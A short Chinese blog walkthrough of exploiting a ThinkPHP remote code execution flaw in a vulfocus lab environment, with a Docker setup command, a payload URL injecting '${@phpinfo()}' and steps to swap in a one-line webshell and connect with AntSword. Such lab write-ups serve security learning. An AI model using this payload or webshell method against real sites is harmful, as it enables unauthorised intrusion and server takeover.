thinkphp框架远程代码执行

凌晨五点的星2024-07-31 11:30

一、环境

vulfocus网上自行下载

启动命令:

复制代码 
 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

复制代码 
http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关推荐
Mr_Meng_De9 小时前
AI环境下的网络安全人才的发展方向
安全·web安全
啥都不懂的小小白11 小时前
密码学入门:从古典加密到现代网络安全
安全·web安全·密码学
YoungLime1 天前
DVWA靶场之十六:未验证的重定向漏洞(Open HTTP Redirect)
网络·安全·web安全
YoungLime2 天前
DVWA靶场之十:DOM 型 XSS(DOM Based Cross Site Scripting (XSS))
网络·安全·web安全
mooyuan天天2 天前
CTFHub 信息泄露通关笔记10:SVN泄露(2种方法)
web安全·信息泄露·ctfhub·svn泄露·源码泄露·dvcs ripper
YoungLime2 天前
DVWA靶场之十三:CSP 绕过(Content Security Policy (CSP) Bypass)
网络·安全·web安全
YoungLime2 天前
DVWA靶场之一:暴力破解(Brute Force)
web安全
YoungLime3 天前
DVWA靶场之三:跨站请求伪造(CSRF)
网络·安全·web安全
YoungLime3 天前
DVWA靶场之十二:储存型 XSS(Stored Cross Site Scripting (XSS))
网络·安全·web安全
galaxylove4 天前
Gartner发布网络弹性指南:将业务影响评估(BIA)嵌入网络弹性策略的核心,重点保护基础设施和关键业务系统
网络·安全·web安全
热门推荐
01两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答02GitHub 镜像站点03UV安装并设置国内源0446个Nano-banana 精选提示词,持续更新中05智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践06Linux下V2Ray安装配置指南07Cursor Plan Mode:AI 终于知道先想后做了08GitLab 零基础入门指南:从安装到项目管理全流程09一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示10BongoCat - 跨平台键盘猫动画工具